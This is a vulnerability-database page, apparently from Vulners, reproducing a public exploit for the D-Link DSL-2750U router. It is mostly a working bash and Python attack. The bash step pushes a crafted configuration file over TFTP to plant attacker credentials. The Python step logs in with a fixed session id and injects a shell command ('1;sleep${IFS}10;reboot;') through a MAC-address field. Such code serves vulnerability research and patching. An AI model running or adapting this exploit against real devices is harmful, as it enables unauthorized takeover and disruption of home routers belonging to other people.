Vulners
Lucene search
Dlink DSL2750U - (Reboot) Command Injection Exploit
# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
# Exploit Author: Mohammed Hadi (HadiMed)
# Vendor Homepage: https://me.dlink.com/consumer
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)
###
#!/bin/bash
# Exploit by HadiMed
# Takes advantage of the tftp server that accepts the cfg file blindly
echo -ne "\n"
echo "Exploiting Dlink DSL-2750u version 1.6"
echo -ne "\n\n"
# Sending the payload
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
echo -ne "\n"
echo "File uploaded Successfully"
echo "Waiting for router to restart"
sleep 180 # approximate time for router to restart
python3 exploit.py
###
import requests
# HTTP request looks like this
'''
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.1.1
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/cgi-bin/webproc
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
Connection: close
getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91
'''
# 1 Getting a session id
# password and username crafted by me on the cfg.xml file
username = "pwned"
password= "pwned"
# acually the client set the sessionid in condition that the password and username are correct
Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
Contentty="application/x-www-form-urlencoded"
Referer="http://192.168.1.1/cgi-bin/webproc"
Contentlen="175"
# Sending first request to set our session id
response = requests.post("http://192.168.1.1/cgi-bin/webproc",
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
,
data={ "getpage":"html/index.html",
"errorpage":"html/main.html",
"var:menu" : "setup",
"var:page":"wizard",
"obj-action":"auth",
":username":username,
":password":password,
":action":"login",
":sessionid":"deadbeef"
}
)
Referer = "http://192.168.1.1/cgi-bin/webupg"
name = "mac"
cmd = "1;sleep${IFS}10;reboot;"
Contentlen = str(len(name+cmd)+10)
if response.status_code==302:
print("got sessionid=deadbeef !\n waiting for the reverse shell ...")
# access cgi-bin/webupg
try :
response = requests.post("http://192.168.1.1/cgi-bin/webupg",
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
,data = {"name":name , "newmac":cmd} , timeout=0.0000000001
)
except requests.exceptions.Timeout :
print("done router will restart in 20 sec")
print("Device restarted!")
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4